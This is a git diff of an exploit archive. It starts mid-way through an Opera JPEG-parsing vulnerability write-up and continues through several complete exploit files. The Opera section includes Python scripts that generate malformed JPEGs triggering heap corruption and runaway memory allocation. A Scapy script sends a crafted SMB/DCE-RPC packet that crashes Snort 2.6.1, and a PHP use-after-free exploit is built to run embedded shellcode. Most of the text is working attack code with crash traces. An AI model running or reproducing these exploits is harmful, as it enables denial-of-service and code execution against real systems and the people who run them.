ebx, edx +74E5D7CE inc ecx ; n+=1 +74E5D7CF cmp ecx, 10 ; until n > 16 +74E5D7D2 jb short Opera_1.74E5D7C2 +74E5D7D4 lea eax, dword ptr ds:[ebx+1] +74E5D7D7 mov dword ptr ss:[ebp-18], ebx +74E5D7DA push eax +74E5D7DB call Opera_1.751E8B75 ; Opera allocation function + +Several operations are made here, single stepping might be interesting, +to follow the read-in process. + +74E5D7E0 mov edi, eax +74E5D7E2 lea eax, dword ptr ds:[ebx+ebx] +74E5D7E5 push eax +74E5D7E6 mov dword ptr ss:[ebp-1C], edi +74E5D7E0 mov edi, eax +74E5D7E2 lea eax, dword ptr ds:[ebx+ebx] +74E5D7E5 push eax +74E5D7E6 mov dword ptr ss:[ebp-1C], edi +74E5D7E9 call Opera_1.751E8B75 ; Opera allocation function + +If you return here, the last procedures are made. + +74E5D8A7 mov eax, dword ptr ss:[ebp-18] +74E5D8AA add eax, 260 ; new allocation size +74E5D8AF push eax +74E5D8B0 call Opera_1.751E8B75 ; Opera allocation function + + 76709E57 push esi ; Size + 76709E58 push 0 ; Flags + 76709E5A push dword ptr ds:[768268C0] ; Handle + 76709E60 call dword ptr ds:[7671C1C0] ; ntdll.RtlAllocateHeap + + 6BB01414 lea edx, dword ptr ds:[esi+8] ; our "string" + 6BB01417 mov dword ptr ss:[ebp-10C], edx + 6BB0141D mov eax, dword ptr ds:[edx] + 6BB0141F mov dword ptr ss:[ebp-16C], eax + 6BB01425 mov ecx, dword ptr ds:[edx+4] + 6BB01428 mov dword ptr ss:[ebp-114], ecx + 6BB0142E mov edi, dword ptr ds:[ecx] ; ds:[41414141]=??? + + +Access violation when reading [41414141] + +EAX 41414141 +ECX 41414141 +EDX 5C9C9348 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +EBX 59110000 +ESP 578DEB6C +EBP 578DED8C +ESI 5C9C9340 +EDI 0000004F +EIP 3D3D142E ntdll.3D3D142E + +At this point we are able to control 4 bytes of EAX and ECX with two bytes, +defined in the JPEG file. +Somebody with a better understanding of the "Define Huffman Table" segment +can probably do more. There are several other issues in parsing this segment. +These routines are very nested and big, it would be a very time-consuming +research. + + + ************************************************** + + +Details - ntdll.RtlAllocateHeap() SOS vulnerability +--------------------------------------------------- + +The arrows mark the components whose datatypes are not properly validated by +Opera. This can lead to unexpected vulnerabilities depending on the function +flow. + +Segment: Start Of Scan (SOS) + +SOS: FF DA +Length: 00 0C +Components: 03 +Data of component: + - component number: 01 + - 4Bit DC table, 4Bit AC table: 00 + + - component number: 02 + - 4Bit DC table, 4Bit AC table: 11 + + - component number: 03 + - 4Bit DC table, 4Bit AC table: 11 + +In the next example we set the value of "Components" to 01, we also overwrite +the end of file with dump bytes. Note, that we also overwrite the JPEG end +marker FF D9. + +After executing this JPEG file with Opera, Opera immediatly allocates memory +until the max page size value is reached, but it doesn't stop. + +Note that some third party applications could also crash during this process, +in my case Antivir crashed with a "read memory" error. + + +# File: pavarotti.py +# ATTENTION, THIS COULD DAMAGE YOUR RUNNING SYSTEM! +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x01, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x41, + 0x41, 0x41, 0x41, 0x03, 0x41, 0x41, 0x41, 0x41, 0x11, 0x41, 0x41, 0x41, 0x41, + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x01, 0x01, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xFF, + 0xDA, 0x00, 0x0C, 0x01, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x11, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41] + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python pavarotti.py +pavarotti.py.jpg created! (637 bytes) +F:\vulndev\Opera> opera pavarotti.py.jpg + + +As said, this could be also interesting on mobile phones with Opera Mini. The +user has no real control to kill the Opera process, which should result in a +phone reboot. This was not tested. + + + ************************************************** + + +Further vulnerabilities +----------------------- + +The arrows mark the components whose datatypes are not properly validated by +Opera. + + +Segment: Start Of Frame (SOF) + +SOF: FF C0 +Length: 00 11 +Strictness: 08 +Image Hori.: 00 01 +Image Vert.: 00 01 +Components: 03 +Data of component: + - component number: 01 + - 4Bit hori., 4Bit vert., sample factor: 22 + - Number of quantisation table: 00 <- + + - component number: 02 + - 4Bit hori., 4Bit vert., sample factor: 11 + - Number of quantisation table: 01 <- + + - component number: 03 + - 4Bit hori., 4Bit vert., sample factor: 11 + - Number of quantisation table: 01 <- + + +The item "Number of quantisation table" of the first component is changed to +FFh in the below file. + + +# File: sof-quanttable.py +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, + 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, + 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, + 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, + 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + + 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, + 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0xFF, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, + 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, + 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] + + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python sof-quanttable.py +sof-quanttable.py.jpg created! (304 bytes) +F:\vulndev\Opera> + + +(ntdll) +7C9211D5 mov eax, dword ptr ds:[esi+C] +7C9211D8 mov dword ptr ss:[ebp-98], eax +7C9211DE mov edx, dword ptr ds:[eax] ; <-- CRASH + +EAX 01010101 +ECX 00EB2780 +EDX 00930178 +EBX 00930000 +ESP 0012EC94 +EBP 0012EEB4 +ESI 00EB2778 +EDI 01010101 +EIP 7C9211DE ntdll.7C9211DE + +---- + +Segment: Start Of Scan (SOS) + +SOS: FF DA +Length: 00 0C +Components: 03 +Data of component: + - component number: 01 + - 4Bit DC table, 4Bit AC table: 00 <- + + - component number: 02 + - 4Bit DC table, 4Bit AC table: 11 <- + + - component number: 03 + - 4Bit DC table, 4Bit AC table: 11 <- + + +The item "4Bit DC table, 4Bit AC table" of the first component is changed to +FFh in the below file. + +# File: sos-dcactable.py +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, + 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, + 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, + 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, + 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, + 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, + 0xDA, 0x00, 0x0C, 0x03, 0x01, + 0xFF, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, + 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] + + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python sos-dcactable.py +sos-dcactable.py.jpg created! (304 bytes) +F:\vulndev\Opera> + + +67AEE715 push ebp +67AEE716 mov ebp, esp +67AEE718 push esi +67AEE719 mov esi, ecx +67AEE71B cmp dword ptr ds:[esi+48], 8 +67AEE71F jge short Opera_12.67AEE733 +67AEE721 push dword ptr ss:[ebp+8] +67AEE724 call Opera_12.67AEE7FE +67AEE729 cmp dword ptr ds:[esi+48], 8 +67AEE72D jge short Opera_12.67AEE733 +67AEE72F push 1 +67AEE731 jmp short Opera_12.67AEE75E +67AEE733 mov eax, dword ptr ds:[esi+44] ; ds=B3001F00 (end part of jpeg file) +67AEE736 mov ecx, dword ptr ds:[esi+24] +67AEE739 shr eax, 18 +67AEE73C add eax, ecx ; +67AEE73E movzx ecx, byte ptr ds:[eax+60] ; <-- CRASH + +EAX 000000B2 +ECX FFFFFFFF +EDX 00EE2534 +EBX 00000005 +ESP 0012ECB0 +EBP 0012ECB4 +ESI 00EE2534 +EDI 00EE2534 +EIP 67AEE73E Opera_12.67AEE73E + + + ************************************************** + +# milw0rm.com [2007-01-08] diff --git a/platforms/multiple/dos/3362.py b/platforms/multiple/dos/3362.py index 768b1b6a6..bf3f5cc15 100755 --- a/platforms/multiple/dos/3362.py +++ b/platforms/multiple/dos/3362.py @@ -1,76 +1,76 @@ -#!/usr/bin/python -# -# Snort DCE/RPC Preprocessor Buffer Overflow (DoS) -# -# Author: Trirat Puttaraksa -# -# http://sf-freedom.blogspot.com -# -###################################################### -# For educational purpose only -# -# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution -# may be possible, but I have no time to make it :( -# I will post the information about this vulnerability in my blog soon -# -# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) -# to inject the packet, so you have to install Scapy before use it. -# -####################################################### - -import sys -from scapy import * -from struct import pack -conf.verb = 0 - -# NetBIOS Session Service -payload = "\x00\x00\x01\xa6" - -# SMB Header -payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00" -payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" -payload += "\x00\x08\x30\x00" - -# Tree Connect AndX Request -payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00" -payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00" -payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00" -payload += "\x3f\x3f\x3f\x3f\x3f\x00" - -# NT Create AndX Request -payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00" -payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00" -payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00" -payload += "\x63\x00\x00\x00" - -# Write AndX Request #1 -payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" -payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee" - -payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00" -payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" -payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" -payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" -payload += "\x2b\x10\x48\x60\x02\x00\x00\x00" - -# Write AndX Request #2 -payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" -payload += "\x00\x48\x00\x00\x00\xff\x01\x30\x01\x00\x00\x00\x00\x49\x00\xee" - -payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00" -payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" -payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" -payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" -payload += "\x2b\x10\x48\x60\x02\x00\x00\x00" - -if len(sys.argv) != 2: - print "Usage snort_dos_dcerpc.py " - sys.exit(1) - -target = sys.argv[1] - -p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload -send(p) - -# milw0rm.com [2007-02-23] +#!/usr/bin/python +# +# Snort DCE/RPC Preprocessor Buffer Overflow (DoS) +# +# Author: Trirat Puttaraksa +# +# http://sf-freedom.blogspot.com +# +###################################################### +# For educational purpose only +# +# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution +# may be possible, but I have no time to make it :( +# I will post the information about this vulnerability in my blog soon +# +# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) +# to inject the packet, so you have to install Scapy before use it. +# +####################################################### + +import sys +from scapy import * +from struct import pack +conf.verb = 0 + +# NetBIOS Session Service +payload = "\x00\x00\x01\xa6" + +# SMB Header +payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00" +payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" +payload += "\x00\x08\x30\x00" + +# Tree Connect AndX Request +payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00" +payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00" +payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00" +payload += "\x3f\x3f\x3f\x3f\x3f\x00" + +# NT Create AndX Request +payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00" +payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00" +payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00" +payload += "\x63\x00\x00\x00" + +# Write AndX Request #1 +payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" +payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee" + +payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00" +payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" +payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" +payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" +payload += "\x2b\x10\x48\x60\x02\x00\x00\x00" + +# Write AndX Request #2 +payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" +payload += "\x00\x48\x00\x00\x00\xff\x01\x30\x01\x00\x00\x00\x00\x49\x00\xee" + +payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00" +payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" +payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" +payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" +payload += "\x2b\x10\x48\x60\x02\x00\x00\x00" + +if len(sys.argv) != 2: + print "Usage snort_dos_dcerpc.py " + sys.exit(1) + +target = sys.argv[1] + +p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload +send(p) + +# milw0rm.com [2007-02-23] diff --git a/platforms/multiple/dos/3394.php b/platforms/multiple/dos/3394.php index 11429d38c..dca867005 100755 --- a/platforms/multiple/dos/3394.php +++ b/platforms/multiple/dos/3394.php @@ -1,71 +1,71 @@ - Refcount drops down to 0 - // => String gets freed - // 4) Free some more zvals - // 5) Create a new array with one element - // => Put shellcode in the key - // => Hashtable struct will be in the same place as the string - // 6) Use string to directly access the content of the Hashtable - // => Read pointer to first bucket - // => Add 32 bytes, offset to array key - // => Write pointer to the destructor field - // 7) Unset array => Executes code in $shellcode - - //////////////////////////////////////////////////////////////////////// - // If you touch anything below this line you have to debug it yourself - //////////////////////////////////////////////////////////////////////// - - $________________________str = str_repeat("A", 39); - $________________________yyy = &$________________________str; - $________________________xxx = &$________________________str; - for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str; - $________________________aaa = " XXXXX "; - $________________________aab = " XXXx.xXXX "; - $________________________aac = " XXXx.xXXX "; - $________________________aad = " XXXXX "; - unset($________________________xxx); - unset($________________________aaa); - unset($________________________aab); - unset($________________________aac); - unset($________________________aad); - $arr = array($shellcode => 1); - - $addr = unpack("L", substr($________________________str, 6*4, 4)); - $addr = $addr[1] + 32; - $addr = pack("L", $addr); - - for ($i=0; $i - -# milw0rm.com [2007-03-01] + Refcount drops down to 0 + // => String gets freed + // 4) Free some more zvals + // 5) Create a new array with one element + // => Put shellcode in the key + // => Hashtable struct will be in the same place as the string + // 6) Use string to directly access the content of the Hashtable + // => Read pointer to first bucket + // => Add 32 bytes, offset to array key + // => Write pointer to the destructor field + // 7) Unset array => Executes code in $shellcode + + //////////////////////////////////////////////////////////////////////// + // If you touch anything below this line you have to debug it yourself + //////////////////////////////////////////////////////////////////////// + + $________________________str = str_repeat("A", 39); + $________________________yyy = &$________________________str; + $________________________xxx = &$________________________str; + for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str; + $________________________aaa = " XXXXX "; + $________________________aab = " XXXx.xXXX "; + $________________________aac = " XXXx.xXXX "; + $________________________aad = " XXXXX "; + unset($________________________xxx); + unset($________________________aaa); + unset($________________________aab); + unset($________________________aac); + unset($________________________aad); + $arr = array($shellcode => 1); + + $addr = unpack("L", substr($________________________str, 6*4, 4)); + $addr = $addr[1] + 32; + $addr = pack("L", $addr); + + for ($i=0; $i + +# milw0rm.com [2007-03-01] diff --git a/platforms/multiple/dos/3404.php b/platforms/multiple/dos/3404.php index f6beb955c..2cb4f3921 100755 --- a/platforms/multiple/dos/3404.php +++ b/platforms/multiple/dos/3404.php @@ -1,31 +1,31 @@ -
- - - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC - - - - "); -?> - -# milw0rm.com [2007-03-04] +
